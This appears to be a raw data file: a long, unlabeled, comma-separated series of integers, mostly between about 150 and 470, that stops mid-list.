352, 337, 324, 356, 346, 343, 326, 352, 329, 324, 320, 315, 307, 314, 301, 308, 305, 292, 300, 302, 308, 322, 372, 364, 353, 345, 353, 349, 333, 357, 357, 339, 348, 309, 283, 275, 274, 256, 270, 230, 249, 229, 217, 236, 234, 243, 223, 226, 243, 248, 218, 225, 239, 234, 226, 223, 233, 216, 230, 221, 215, 215, 212, 225, 197, 199, 186, 200, 199, 245, 224, 223, 230, 223, 249, 229, 227, 237, 229, 226, 248, 239, 239, 248, 245, 252, 224, 234, 222, 242, 216, 224, 215, 215, 243, 218, 224, 232, 249, 227, 240, 234, 219, 185, 194, 174, 167, 211, 202, 194, 190, 200, 257, 282, 268, 256, 268, 306, 311, 396, 377, 379, 381, 408, 385, 331, 296, 301, 301, 305, 313, 295, 274, 289, 286, 295, 291, 304, 305, 295, 303, 294, 262, 261, 263, 283, 291, 278, 247, 253, 243, 241, 227, 231, 227, 224, 229, 231, 231, 227, 237, 245, 239, 241, 246, 206, 222, 225, 224, 251, 308, 301, 289, 307, 310, 325, 299, 328, 393, 388, 388, 388, 369, 392, 390, 349, 352, 358, 367, 366, 366, 365, 368, 359, 357, 337, 342, 336, 335, 325, 327, 450, 467, 458, 456, 417, 454, 439, 451, 471, 451, 470, 455, 434, 443, 446, 453, 430, 445, 444, 449, 454, 447, 450, 444, 446, 367, 512, 460, 450, 439, 438, 454, 442, 446, 438, 441, 430, 406, 381, 365, 374, 349, 265, 261, 263, 242, 255, 251, 250, 263, 259, 249, 249, 263, 254, 250, 268, 264, 257, 270, 268, 255, 271, 309, 383, 385, 384, 389, 380, 394, 395, 383, 388, 396, 289, 323, 282, 260, 369, 383, 377, 393, 387, 376, 359, 367, 353, 345, 345, 346, 361, 349, 303, 276, 261, 271, 212, 233, 209, 225, 216, 200, 236, 242, 248, 250, 307, 349, 357, 350, 356, 364, 366, 351, 347, 340, 355, 335, 338, 336, 351, 341, 336, 337, 339, 339, 343, 330, 342, 333, 330, 342, 341, 314, 303, 313, 311, 406, 427, 433, 437, 425, 420, 453, 424, 429, 440, 381, 356, 343, 342, 332, 305, 326, 314, 295, 321, 309, 303, 319, 377, 380, 381, 383, 375, 400, 389, 354, 380, 330, 295, 309, 306, 285, 333, 336, 360, 332, 340, 345, 338, 357, 351, 357, 355, 349, 349, 369, 365, 371, 357, 364, 355, 367, 361, 343, 337, 341, 342, 336, 347, 333, 350, 327, 338, 320, 314, 321, 318, 310, 292, 301, 309, 305, 322, 338, 337, 372, 397, 428, 407, 384, 362, 381, 382, 375, 376, 312, 319, 307, 311, 327, 393, 417, 416, 397, 409, 404, 420, 435, 411, 422, 410, 351, 335, 327, 324, 355, 384, 362, 366, 372, 369, 366, 305, 311, 303, 359, 311, 301, 293, 301, 312, 299, 299, 308, 305, 311, 298, 311, 289, 321, 321, 331, 329, 332, 334, 355, 319, 306, 287, 270, 304, 312, 305, 402, 405, 424, 349, 343, 342, 346, 344, 354, 350, 335, 344, 337, 345, 342, 327, 331, 318, 328, 332, 342, 326, 308, 317, 314, 303, 297, 305, 304, 311, 303, 326, 294, 359, 383, 390, 399, 389, 380, 387, 377, 394, 376, 383, 376, 278, 325, 333, 330, 325, 313, 310, 315, 306, 301, 306, 392, 321, 329, 301, 321, 322, 325, 301, 302, 320, 344, 356, 338, 366, 370, 358, 361, 360, 376, 373, 364, 355, 373, 357, 364, 355, 352, 377, 373, 360, 363, 362, 322, 299, 267, 325, 302, 291, 298, 301, 330, 313, 284, 259, 257, 257, 291, 263, 239, 232, 207, 215, 222, 221, 206, 224, 218, 205, 226, 215, 207, 208, 198, 217, 210, 192, 210, 211, 243, 254, 251, 260, 245, 275, 341, 344, 334, 325, 345, 333, 337, 336, 329, 342, 353, 368, 379, 391, 370, 346, 367, 354, 342, 352, 332, 354, 335, 325, 331, 346, 338, 334, 283, 285, 299, 307, 319, 289, 294, 248, 263, 229, 239, 228, 232, 235, 238, 255, 236, 244, 269, 262, 269, 279, 283, 286, 272, 282, 309, 357, 360, 372, 372, 364, 372, 359, 360, 356, 356, 358, 373, 381, 385, 401, 348, 393, 392, 331, 298, 291, 275, 260, 259, 276, 259, 272, 266, 262, 264, 249, 263, 276, 259, 286, 258, 266, 272, 276, 258, 266, 282, 272, 281, 277, 267, 276, 284, 277, 275, 273, 288, 294, 277, 281, 280, 313, 362, 329, 369, 346, 361, 364, 337, 339, 343, 395, 400, 312, 311, 299, 308, 282, 234, 228, 231, 247, 231, 236, 226, 239, 228, 233, 240, 232, 226, 236, 226, 226, 373, 459, 439, 448, 462, 446, 454, 444, 441, 444, 374, 370, 359, 354, 319, 316, 307, 305, 324, 314, 311, 322, 303, 304, 288, 301, 315, 268, 285, 269, 270, 273, 284, 317, 265, 291, 275, 261, 254, 258, 265, 254, 288, 254, 251, 253, 266, 253, 244, 262, 250, 257, 247, 276, 304, 280, 286, 275, 240, 256, 247, 239, 233, 294, 300, 285, 294, 285, 302, 288, 295, 369, 367, 352, 354, 396, 385, 381, 385, 371, 385, 380, 372, 321, 325, 306, 306, 297, 292, 288, 271, 268, 295, 248, 228, 219, 231, 226, 245, 245, 225, 227, 244, 235, 245, 230, 237, 230, 231, 232, 228, 232, 193, 212, 185, 196, 192, 235, 214, 215, 217, 227, 238, 243, 228, 261, 246, 244, 257, 294, 310, 335, 326, 334, 351, 345, 325, 332, 338, 327, 349, 352, 354, 335, 333, 346, 316, 319, 321, 326, 335, 325, 334, 336, 328, 328, 330, 320, 334, 319, 335, 325, 332, 315, 327, 291, 281, 281, 264, 268, 281, 263, 258, 264, 263, 250, 265, 259, 261, 257, 259, 263, 242, 271, 310, 443, 446, 451, 432, 444, 465, 441, 439, 451, 426, 370, 365, 369, 355, 369, 360, 395, 359, 379, 362, 315, 306, 294, 316, 300, 291, 293, 296, 302, 302, 296, 294, 296, 279, 287, 284, 286, 229, 249, 207, 186, 198, 198, 203, 202, 203, 197, 197, 373, 372, 367, 379, 374, 358, 303, 298, 298, 306, 309, 315, 271, 300, 286, 291, 294, 287, 283, 283, 278, 266, 216, 205, 199, 232, 227, 221, 228, 245, 240, 238, 246, 224, 222, 232, 264, 270, 274, 271, 274, 318, 338, 361, 345, 342, 355, 336, 260, 234, 248, 237, 252, 247, 263, 251, 264, 264, 281, 278, 275, 275, 292, 273, 269, 277, 270, 296, 257, 336, 346, 332, 306, 225, 235, 244, 221, 207, 222, 230, 227, 233, 225, 221, 218, 226, 221, 232, 218, 215, 218, 240, 237, 235, 216, 239, 217, 245, 223, 233, 329, 412, 404, 434, 412, 410, 433, 432, 399, 402, 418, 320, 277, 276, 281, 279, 292, 273, 348, 418, 378, 396, 385, 372, 385, 394, 361, 367, 392, 373, 253, 258, 243, 257, 246, 255, 247, 464, 455, 440, 433, 444, 451, 447, 436, 441, 437, 376, 350, 355, 344, 337, 350, 357, 353, 353, 344, 353, 344, 282, 266, 284, 276, 276, 279, 257, 272, 273, 269, 274, 260, 273, 271, 278, 283, 267, 282, 287, 264, 316, 379, 358, 331, 353, 355, 342, 344, 350, 345, 361, 367, 378, 379, 407, 303, 275, 269, 262, 258, 261, 260, 270, 276, 239, 238, 311, 380, 396, 368, 387, 403, 388, 384, 367, 380, 358, 343, 249, 236, 234, 218, 360, 312, 369, 341, 363, 356, 367, 361, 348, 360, 358, 396, 393, 416, 421, 363, 352, 363, 357, 340, 353, 345, 334, 333, 364, 389, 393, 375, 375, 345, 311, 282, 295, 247, 244, 256, 208, 215, 204, 220, 221, 225, 223, 219, 233, 212, 213, 219, 266, 270, 232, 223, 223, 242, 242, 241, 245, 243, 230, 212, 214, 218, 226, 226, 213, 215, 237, 228, 255, 238, 241, 241, 251, 243, 248, 254, 249, 250, 234, 257, 290, 287, 302, 302, 306, 325, 316, 319, 321, 315, 399, 418, 425, 433, 408, 417, 391, 399, 420, 397, 392, 362, 342, 331, 352, 360, 367, 331, 342, 327, 311, 314, 334, 344, 340, 350, 327, 354, 329, 322, 329, 329, 314, 336, 323, 326, 354, 329, 323, 381, 398, 401, 384, 398, 388, 383, 366, 369, 383, 378, 348, 281, 253, 253, 260, 287, 276, 261, 252, 266, 271, 263, 243, 239, 253, 268, 252, 246, 221, 215, 195, 224, 187, 347, 367, 352, 349, 321, 331, 341, 348, 333, 304, 330, 334, 332, 340, 334, 329, 331, 336, 319, 255, 251, 245, 232, 232, 237, 223, 227, 228, 329, 340, 356, 342, 351, 300, 296, 296, 267, 276, 297, 293, 318, 320, 311, 336, 327, 312, 280, 256, 250, 257, 242, 259, 254, 250, 294, 295, 302, 311, 322, 302, 313, 297, 301, 353, 429, 414, 407, 416, 405, 421, 439, 417, 422, 414, 387, 383, 380, 376, 368, 319, 292, 306, 281, 265, 265, 261, 198, 195, 188, 200, 212, 225, 209, 208, 229, 202, 206, 197, 206, 217, 228, 217, 224, 211, 263, 461, 441, 454, 443, 440, 428, 384, 357, 344, 326, 280, 287, 307, 260, 276, 269, 278, 282, 253, 266, 270, 272, 272, 310, 305, 314, 307, 301, 307, 311, 310, 364, 432, 395, 412, 418, 403, 403, 403, 417, 414, 412, 386, 415, 422, 408, 394, 349, 354, 333, 336, 361, 340, 355, 342, 336, 334, 351, 342, 350, 347, 346, 339, 357, 344, 335, 352, 368, 352, 371, 338, 355, 337, 343, 309, 321, 309, 312, 317, 317, 306, 320, 315, 307, 413, 423, 438, 431, 419, 430, 431, 433, 431, 437, 392, 407, 348, 357, 338, 351, 362, 349, 350, 343, 371, 348, 351, 355, 358, 368, 364, 359, 346, 333, 335, 321, 321, 329, 340, 334, 324, 323, 311, 333, 331, 334, 323, 330, 304, 253, 274, 268, 283, 278, 280, 260, 275, 326, 433, 446, 442, 448, 454, 412, 413, 439, 374, 331, 309, 326, 318, 323, 321, 312, 289, 330, 326, 385, 428, 416, 412, 409, 365, 378, 351, 353, 362, 373, 335, 339, 345, 349, 331, 341, 350, 348, 357, 343, 369, 386, 363, 408, 381, 377, 383, 377, 368, 381, 367, 353, 361, 353, 357, 356, 361, 357, 353, 360, 368, 353, 378, 376, 380, 368, 373, 391, 319, 296, 263, 235, 210, 228, 214, 231, 227, 223, 221, 224, 220, 224, 230, 241, 238, 225, 240, 234, 395, 464, 376, 372, 354, 340, 334, 333, 333, 336, 335, 340, 336, 344, 322, 316, 326, 311, 310, 308, 380, 359, 378, 380, 366, 355, 360, 362, 376, 360, 353, 366, 363, 352, 340, 335, 342, 335, 325, 319, 316, 322, 300, 305, 324, 314, 363, 381, 376, 381, 377, 372, 372, 374, 366, 389, 363, 343, 354, 314, 344, 332, 303, 334, 342, 346, 326, 333, 331, 343, 315, 315, 291, 294, 326, 382, 370, 357, 349, 368, 365, 340, 360, 361, 362, 355, 348, 359, 357, 358, 353, 355, 349, 360, 374, 376, 360, 360, 376, 393, 356, 347, 339, 333, 357, 347, 332, 297, 276, 277, 246, 249, 251, 275, 253, 249, 211, 222, 210, 223, 222, 205, 219, 225, 339, 347, 365, 369, 341, 342, 366, 339, 342, 332, 328, 323, 348, 345, 368, 332, 353, 329, 341, 341, 341, 353, 331, 322, 308, 317, 307, 304, 306, 304, 316, 295, 303, 312, 300, 301, 306, 295, 312, 299, 311, 296, 308, 304, 292, 315, 314, 339, 327, 294, 297, 301, 310, 345, 352, 377, 369, 374, 364, 382, 371, 386, 345, 342, 359, 351, 345, 348, 360, 367, 348, 361, 351, 349, 342, 352, 355, 334, 357, 351, 334, 312, 316, 302, 303, 306, 311, 326, 314, 368, 407, 394, 400, 358, 369, 302, 311, 290, 306, 295, 291, 303, 260, 276, 294, 282, 283, 269, 273, 292, 283, 263, 277, 270, 283, 293, 359, 339, 352, 350, 342, 351, 346, 363, 370, 338, 350, 317, 306, 308, 286, 284, 263, 257, 256, 232, 238, 232, 236, 237, 231, 242, 229, 185, 193, 221, 203, 210, 190, 195, 224, 210, 253, 261, 259, 255, 249, 262, 260, 247, 329, 353, 336, 335, 348, 333, 276, 263, 280, 272, 281, 282, 264, 366, 363, 353, 356, 365, 358, 365, 365, 337, 339, 340, 350, 359, 340, 342, 355, 368, 372, 369, 401, 396, 418, 385, 398, 398, 403, 384, 387, 394, 399, 397, 375, 374, 388, 383, 361, 331, 312, 321, 321, 315, 329, 309, 316, 318, 319, 389, 396, 378, 379, 391, 394, 361, 288, 279, 269, 287, 283, 264, 272, 296, 288, 296, 277, 299, 211, 209, 209, 196, 210, 193, 221, 209, 201, 209, 213, 213, 208, 211, 213, 215, 302, 377, 396, 351, 371, 364, 355, 355, 284, 373, 358, 360, 285, 261, 257, 267, 271, 243, 272, 266, 256, 246, 278, 266, 272, 293, 280, 277, 306, 296, 281, 272, 290, 275, 286, 280, 283, 294, 286, 277, 286, 292, 335, 366, 348, 350, 362, 363, 367, 265, 269, 279, 277, 270, 267, 279, 289, 280, 293, 274, 295, 285, 297, 346, 357, 355, 337, 347, 330, 297, 330, 310, 312, 333, 326, 322, 319, 322, 303, 302, 323, 333, 330, 321, 291, 273, 287, 298, 293, 289, 288, 301, 285, 304, 291, 293, 290, 270, 284, 313, 340, 338, 329, 320, 325, 336, 328, 339, 350, 372, 380, 365, 359, 325, 368, 363, 364, 374, 374, 413, 369, 348, 372, 336, 339, 338, 346, 338, 342, 337, 338, 343, 361, 368, 452, 347, 416, 347, 345, 352, 350, 352, 345, 345, 334, 324, 336, 336, 332, 320, 314, 321, 386, 381, 364, 368, 364, 382, 347, 278, 275, 261, 242, 240, 229, 226, 241, 223, 238, 267, 247, 229, 231, 228, 224, 226, 225, 220, 225, 211, 234, 238, 247, 245, 239, 259, 248, 243, 248, 265, 230, 236, 230, 250, 235, 236, 245, 216, 195, 188, 194, 181, 184, 203, 195, 201, 199, 197, 228, 273, 271, 273, 233, 294, 279, 275, 277, 270, 282, 275, 273, 268, 286, 280, 267, 318, 374, 372, 361, 361, 329, 312, 248, 275, 262, 247, 261, 267, 251, 262, 253, 238, 256, 254, 256, 256, 248, 248, 244, 237, 258, 256, 248, 241, 245, 256, 243, 248, 240, 242, 247, 243, 216, 222, 213, 214, 213, 214, 203, 209, 211, 222, 203, 202, 216, 209, 195, 272, 283, 296, 272, 272, 283, 320, 361, 347, 346, 281, 266, 257, 242, 240, 246, 257, 248, 259, 256, 262, 287, 352, 375, 368, 345, 376, 367, 360, 339, 339, 331, 334, 334, 350, 338, 338, 326, 335, 342, 315, 332, 389, 400, 382, 390, 383, 381, 380, 396, 378, 383, 323, 292, 289, 259, 285, 272, 251, 208, 215, 226, 202, 221, 235, 259, 260, 252, 277, 263, 243, 264, 258, 372, 374, 360, 358, 370, 356, 366, 351, 260, 280, 295, 361, 362, 359, 398, 387, 406, 357, 349, 343, 332, 356, 338, 338, 294, 300, 288, 300, 292, 296, 295, 297, 288, 295, 272, 354, 378, 379, 388, 369, 372, 364, 362, 366, 361, 353, 359, 359, 360, 357, 376, 358, 302, 296, 356, 296, 294, 261, 257, 256, 262, 259, 283, 305, 329, 306, 324, 308, 318, 306, 334, 376, 320, 341, 371, 366, 356, 380, 366, 337, 326, 364, 382, 365, 348, 344, 366, 384, 365, 358, 369, 349, 345, 343, 344, 344, 297, 266, 264, 296, 267, 274, 267, 269, 272, 241, 269, 276, 256, 260, 248, 250, 262, 269, 258, 260, 246, 311, 384, 382, 384, 390, 375, 390, 367, 352, 339, 302, 298, 285, 308, 285, 272, 265, 307, 289, 295, 278, 295, 301, 274, 293, 296, 289, 278, 283, 291, 276, 245, 224, 194, 220, 245, 238, 232, 219, 233, 228, 212, 219, 216, 212, 222, 221, 219, 220, 221, 200, 202, 184, 180, 191, 201, 184, 223, 386, 395, 377, 369, 393, 382, 383, 385, 378, 399, 375, 328, 288, 277, 278, 238, 243, 241, 219, 239, 250, 229, 246, 245, 238, 227, 233, 242, 265, 242, 237, 230, 233, 237, 242, 227, 223, 210, 202, 220, 221, 212, 215, 206, 198, 212, 201, 202, 197, 199, 195, 184, 255, 287, 276, 279, 271, 352, 347, 361, 339, 360, 355, 343, 348, 349, 349, 359, 358, 371, 363, 366, 364, 348, 344, 348, 361, 357, 363, 341, 343, 334, 338, 356, 354, 356, 379, 360, 353, 348, 345, 356, 352, 329, 344, 364, 358, 303, 293, 245, 232, 229, 211, 231, 246, 246, 239, 240, 257, 243, 250, 247, 249, 258, 320, 319, 328, 323, 307, 316, 321, 312, 313, 307, 304, 316, 326, 310, 322, 345, 415, 409, 384, 329, 346, 304, 293, 286, 307, 290, 307, 287, 294, 283, 289, 318, 297, 298, 330, 273, 291, 275, 305, 289, 276, 272, 289, 277, 353, 365, 337, 356, 371, 384, 379, 381, 351, 379, 345, 347, 356, 327, 294, 299, 295, 295, 244, 324, 271, 244, 277, 254, 241, 242, 246, 240, 267, 259, 296, 352, 338, 330, 348, 326, 338, 334, 331, 320, 331, 323, 336, 343, 336, 346, 350, 351, 338, 354, 337, 353, 359, 343, 330, 333, 357, 335, 349, 335, 351, 342, 351, 364, 345, 337, 335, 345, 341, 335, 350, 333, 353, 362, 371, 374, 366, 345, 321, 324, 332, 337, 360, 369, 404, 418, 417, 424, 428, 405, 427, 438, 423, 393, 398, 391, 417, 411, 393, 393, 367, 363, 349, 367, 354, 339, 338, 344, 328, 330, 310, 315, 310, 323, 314, 317, 332, 328, 321, 439, 447, 432, 430, 446, 420, 396, 362, 355, 327, 330, 315, 315, 319, 333, 317, 339, 302, 306, 286, 342, 333, 326, 277, 256, 257, 251, 327, 295, 241, 249, 260, 233, 276, 379, 372, 241, 230, 231, 229, 227, 227, 392, 335, 356, 349, 378, 311, 294, 300, 314, 287, 290, 296, 295, 318, 375, 366, 371, 372, 378, 356, 378, 356, 364, 380, 367, 372, 369, 330, 357, 371, 375, 337, 331, 337, 341, 318, 337, 341, 319, 330, 320, 257, 243, 238, 222, 213, 216, 368, 409, 411, 416, 396, 383, 378, 401, 395, 403, 399, 400, 406, 399, 393, 405, 373, 371, 348, 344, 361, 329, 331, 335, 299, 292, 276, 300, 285, 301, 291, 286, 310, 315, 275, 264, 265, 267, 272, 246, 231, 227, 238, 240, 234, 230, 241, 179, 194, 195, 197, 198, 216, 184, 190, 242, 269, 290, 273, 282, 264, 306, 312, 270, 268, 261, 262, 267, 258, 269, 274, 253, 277, 255, 263, 318, 363, 380, 380, 366, 365, 357, 378, 374, 380, 357, 369, 360, 353, 356, 368, 363, 382, 355, 368, 375, 377, 373, 387, 379, 397, 385, 383, 373, 364, 398, 362, 381, 365, 349, 365, 362, 367, 328, 330, 332, 320, 321, 331, 322, 319, 327, 326, 336, 309, 325, 315, 346, 348, 346, 345, 345, 362, 347, 343, 372, 370, 356, 368, 359, 369, 361, 352, 382, 367, 361, 363, 356, 368, 365, 368, 365, 370, 362, 369, 371, 369, 371, 356, 349, 368, 366, 368, 323, 323, 341, 322, 339, 337, 333, 333, 337, 348, 362, 333, 354, 336, 353, 343, 338, 334, 316, 289, 288, 287, 290, 298, 281, 291, 273, 291, 274, 277, 369, 380, 403, 306, 304, 293, 310, 308, 303, 320, 293, 206, 221, 216, 213, 223, 216, 214, 222, 222, 227, 230, 246, 238, 246, 289, 319, 325, 314, 296, 279, 278, 277, 311, 334, 332, 338, 315, 342, 338, 334, 321, 361, 375, 403, 396, 365, 393, 366, 378, 300, 282, 282, 290, 304, 300, 301, 286, 281, 274, 297, 284, 286, 307, 302, 297, 291, 276, 287, 278, 285, 298, 302, 286, 292, 301, 312, 289, 322, 371, 393, 376, 380, 372, 296, 291, 268, 268, 290, 275, 281, 267, 276, 277, 284, 289, 270, 258, 253, 322, 329, 330, 336, 314, 308, 307, 302, 304, 297, 318, 351, 356, 351, 366, 367, 363, 347, 359, 368, 345, 352, 352, 367, 375, 366, 350, 363, 348, 349, 362, 375, 367, 379, 376, 373, 370, 369, 367, 371, 378, 365, 369, 354, 362, 344, 351, 353, 343, 269, 274, 269, 284, 262, 254, 260, 292, 291, 280, 275, 281, 383, 366, 373, 370, 369, 370, 373, 316, 275, 293, 273, 257, 328, 229, 208, 216, 221, 217, 209, 205, 218, 218, 232, 261, 265, 247, 233, 267, 276, 275, 362, 359, 365, 378, 372, 364, 371, 371, 382, 366, 354, 352, 356, 333, 348, 345, 346, 347, 353, 351, 359, 354, 364, 351, 367, 356, 370, 370, 350, 349, 370, 372, 354, 371, 355, 386, 377, 357, 363, 379, 374, 386, 361, 364, 344, 359, 366, 355, 349, 355, 352, 331, 334, 362, 354, 365, 366, 365, 372, 379, 383, 372, 366, 370, 381, 359, 349, 391, 359, 353, 359, 356, 363, 356, 349, 299, 285, 278, 277, 265, 270, 222, 224, 218, 204, 206, 208, 203, 189, 163, 153, 174, 197, 240, 318, 334, 328, 334, 329, 307, 333, 318, 315, 319, 307, 315, 317, 323, 319, 303, 334, 319, 298, 304, 346, 330, 350, 336, 333, 376, 374, 368, 371, 359, 356, 306, 290, 271, 275, 284, 271, 229, 225, 218, 214, 219, 218, 242, 229, 237, 237, 243, 256, 255, 252, 250, 249, 262, 276, 229, 247, 241, 253, 238, 250, 268, 258, 257, 260, 255, 257, 253, 245, 265, 250, 258, 256, 255, 251, 231, 254, 240, 219, 198, 229, 233, 245, 247, 242, 240, 234, 242, 235, 256, 248, 242, 246, 235, 252, 236, 225, 243, 257, 268, 270, 265, 255, 259, 238, 252, 259, 264, 265, 263, 266, 311, 346, 338, 341, 385, 358, 377, 380, 396, 373, 354, 360, 368, 371, 369, 341, 310, 314, 304, 308, 353, 360, 347, 359, 343, 301, 278, 258, 268, 265, 254, 259, 265, 268, 326, 373, 373, 381, 383, 385, 392, 375, 372, 377, 371, 385, 359, 305, 257, 237, 260, 267, 253, 250, 263, 252, 270, 271, 263, 254, 252, 264, 248, 262, 255, 259, 260, 253, 285, 313, 306, 313, 310, 327, 320, 312, 305, 309, 351, 359, 371, 385, 355, 345, 340, 306, 290, 316, 300, 310, 312, 282, 280, 293, 340, 325, 312, 324, 328, 330, 289, 288, 294, 285, 291, 286, 316, 328, 323, 303, 317, 309, 329, 318, 311, 283, 299, 312, 324, 307, 326, 325, 297, 291, 296, 292, 292, 293, 345, 363, 372, 372, 331, 354, 334, 340, 325, 338, 339, 329, 352, 343, 355, 334, 348, 422, 389, 375, 377, 387, 393, 396, 405, 371, 388, 395, 354, 249, 228, 231, 223, 232, 218, 239, 235, 240, 244, 247, 220, 228, 252, 246, 234, 231, 229, 255, 261, 251, 315, 393, 384, 385, 383, 392, 394, 401, 368, 382, 342, 368, 352, 346, 350, 310, 293, 206, 217, 203, 214, 213, 204, 189, 188, 193, 196, 208, 194, 222, 274, 278, 273, 280, 255, 281, 276, 275, 289, 292, 389, 386, 369, 374, 375, 346, 340, 331, 341, 324, 342, 332, 323, 334, 338, 334, 311, 246, 260, 243, 256, 242, 252, 259, 245, 245, 278, 264, 280, 259, 269, 261, 244, 304, 318, 346, 343, 387, 379, 379, 380, 360, 371, 395, 325, 327, 369, 360, 335, 289, 289, 285, 278, 246, 278, 286, 270, 283, 255, 257, 251, 243, 251, 254, 220, 233, 207, 221, 240, 208, 191, 168, 171, 171, 183, 151, 168, 174, 156, 168, 199, 232, 217, 212, 210, 243, 254, 257, 294, 198, 334, 342, 359, 342, 339, 324, 308, 293, 292, 326, 348, 359, 349, 360, 326, 337, 335, 364, 342, 288, 273, 275, 275, 269, 274, 271, 269, 272, 250, 272, 264, 273, 287, 311, 309, 309, 323, 310, 329, 449, 430, 428, 427, 452, 429, 423, 349, 324, 357, 346, 336, 327, 339, 339, 349, 325, 321, 324, 330, 370, 402, 402, 394, 401, 399, 388, 397, 379, 407, 408, 380, 384, 347, 307, 286, 292, 291, 280, 290, 283, 292, 302, 301, 308, 260, 226, 243, 206, 210, 222, 215, 223, 215, 216, 221, 224, 217, 263, 259, 246, 250, 330, 312, 329, 333, 325, 353, 313, 333, 333, 324, 316, 294, 305, 304, 308, 294, 309, 303, 288, 328, 367, 387, 380, 379, 371, 330, 299, 305, 299, 296, 281, 309, 291, 298, 307, 296, 299, 296, 260, 259, 248, 277, 256, 271, 261, 257, 252, 248, 265, 261, 254, 290, 259, 260, 275, 279, 266, 274, 269, 270, 258, 246, 256, 276, 233, 211, 225, 199, 157, 180, 160, 259, 260, 273, 256, 347, 376, 361, 387, 364, 371, 374, 382, 372, 382, 367, 380, 372, 365, 361, 351, 364, 370, 360, 354, 343, 364, 324, 324, 339, 334, 344, 345, 335, 343, 348, 356, 350, 347, 320, 291, 300, 299, 280, 283, 297, 292, 296, 308, 302, 300, 300, 302, 300, 301, 355, 353, 401, 373, 387, 385, 371, 346, 270, 268, 264, 270, 258, 263, 257, 256, 248, 251, 273, 261, 262, 322, 250, 250, 250, 251, 251, 341, 345, 341, 338, 349, 333, 346, 349, 350, 349, 360, 349, 356, 353, 348, 346, 329, 356, 346, 345, 351, 348, 333, 352, 351, 328, 346, 346, 352, 344, 352, 338, 343, 352, 338, 355, 327, 337, 343, 344, 342, 344, 331, 341, 333, 336, 338, 340, 347, 358, 339, 340, 347, 357, 354, 346, 339, 356, 358, 328, 331, 331, 347, 334, 345, 356, 324, 340, 336, 326, 324, 345, 352, 324, 335, 373, 343, 374, 359, 375, 372, 356, 359, 356, 357, 362, 297, 276, 273, 264, 263, 243, 206, 203, 204, 207, 213, 205, 206, 213, 201, 208, 206, 204, 218, 123, 73, 231, 262, 249, 260, 262, 244, 240, 336, 368, 354, 349, 321, 325, 338, 324, 328, 326, 340, 350, 339, 340, 339, 325, 321, 325, 332, 275, 292, 281, 280, 244, 224, 332, 272, 276, 255, 258, 254, 241, 276, 296, 267, 220, 263, 270, 259, 225, 204, 222, 225, 233, 237, 192, 244, 256, 240, 235, 235, 196, 258, 233, 210, 215, 227, 233, 232, 218, 198, 186, 209, 204, 229, 277, 274, 275, 360, 350, 347, 366, 369, 363, 349, 316, 306, 228, 225, 227, 239, 210, 221, 233, 222, 227, 240, 288, 275, 243, 258, 250, 248, 278, 251, 247, 290, 237, 293, 297, 449, 437, 439, 437, 430, 455, 430, 453, 422, 437, 225, 260, 228, 223, 251, 346, 344, 346, 373, 365, 347, 373, 339, 356, 359, 366, 367, 361, 357, 302, 300, 292, 293, 281, 286, 270, 277, 276, 274, 293, 287, 274, 283, 292, 284, 298, 289, 288, 274, 276, 269, 232, 216, 222, 217, 212, 224, 218, 224, 228, 220, 254, 272, 274, 263, 277, 262, 275, 270, 279, 280, 287, 311, 283, 360, 355, 316, 288, 274, 271, 279, 246, 287, 274, 289, 295, 275, 271, 286, 347, 354, 349, 355, 359, 360, 356, 349, 366, 341, 338, 346, 331, 263, 223, 245, 231, 213, 217, 217, 253, 256, 264, 252, 257, 265, 264, 272, 274, 254, 279, 261, 267, 262, 278, 264, 377, 347, 358, 376, 344, 329, 346, 355, 349, 343, 345, 341, 348, 336, 356, 359, 353, 357, 369, 363, 350, 336, 357, 370, 354, 384, 379, 371, 367, 363, 371, 378, 368, 366, 379, 364, 310, 285, 295, 282, 288, 297, 296, 289, 295, 270, 236, 241, 237, 250, 219, 225, 233, 244, 228, 245, 235, 242, 229, 218, 257, 253, 227, 201, 272, 250, 254, 241, 241, 234, 230, 238, 256, 268, 279, 262, 278, 261, 266, 285, 264, 255, 287, 323, 342, 338, 329, 321, 304, 310, 334, 315, 312, 333, 352, 319, 312, 315, 307, 304, 314, 310, 308, 326, 323, 315, 296, 311, 292, 319, 330, 391, 379, 400, 398, 381, 386, 384, 371, 390, 382, 378, 361, 375, 348, 371, 366, 369, 373, 358, 348, 342, 354, 353, 360, 318, 268, 284, 237, 249, 257, 253, 244, 256, 221, 225, 239, 232, 186, 202, 203, 128, 174, 208, 185, 200, 246, 250, 267, 257, 245, 248, 298, 368, 365, 354, 358, 357, 358, 356, 359, 340, 362, 345, 366, 363, 337, 340, 325, 349, 368, 339, 332, 321, 339, 337, 336, 337, 326, 323, 342, 341, 331, 306, 313, 311, 303, 315, 303, 307, 287, 307, 306, 312, 312, 297, 289, 309, 367, 374, 363, 376, 370, 377, 366, 379, 366, 361, 343, 359, 351, 354, 348, 352, 359, 350, 327, 342, 336, 365, 339, 328, 399, 385, 367, 369, 375, 363, 387, 375, 362, 355, 372, 301, 272, 264, 258, 253, 262, 267, 248, 261, 254, 263, 271, 366, 356, 313, 334, 328, 337, 315, 325, 318, 334, 313, 304, 329, 316, 311, 336, 366, 350, 368, 371, 369, 372, 375, 360, 338, 282, 270, 243, 243, 221, 221, 189, 207, 204, 204, 227, 214, 243, 267, 254, 253, 264, 250, 258, 310, 357, 364, 363, 362, 347, 362, 352, 350, 332, 307, 302, 317, 325, 320, 308, 302, 313, 309, 266, 296, 298, 301, 290, 296, 295, 280, 384, 383, 391, 383, 393, 372, 388, 356, 353, 352, 354, 331, 352, 305, 297, 303, 297, 294, 285, 298, 275, 253, 234, 212, 215, 219, 221, 167, 175, 162, 178, 190, 268, 256, 269, 273, 275, 277, 260, 277, 279, 290, 276, 277, 280, 274, 256, 273, 267, 272, 263, 309, 346, 338, 342, 339, 338, 338, 341, 332, 342, 344, 340, 299, 280, 286, 272, 275, 286, 285, 299, 295, 277, 300, 285, 285, 387, 373, 356, 355, 364, 348, 369, 370, 353, 367, 346, 356, 346, 363, 351, 356, 358, 355, 362, 339, 354, 365, 344, 320, 327, 325, 328, 322, 397, 401, 409, 405, 383, 379, 370, 397, 372, 366, 306, 278, 282, 304, 284, 295, 301, 294, 296, 308, 307, 310, 298, 314, 311, 315, 306, 319, 314, 280, 309, 313, 317, 305, 309, 393, 401, 402, 355, 345, 337, 311, 302, 292, 292, 288, 285, 283, 267, 355, 371, 358, 359, 360, 366, 368, 366, 377, 366, 362, 352, 345, 344, 336, 329, 326, 316, 321, 318, 338, 324, 331, 341, 324, 330, 332, 337, 330, 327, 315, 306, 324, 292, 296, 276, 282, 285, 337, 326, 334, 315, 346, 339, 320, 313, 317, 294, 280, 300, 283, 277, 269, 266, 318, 359, 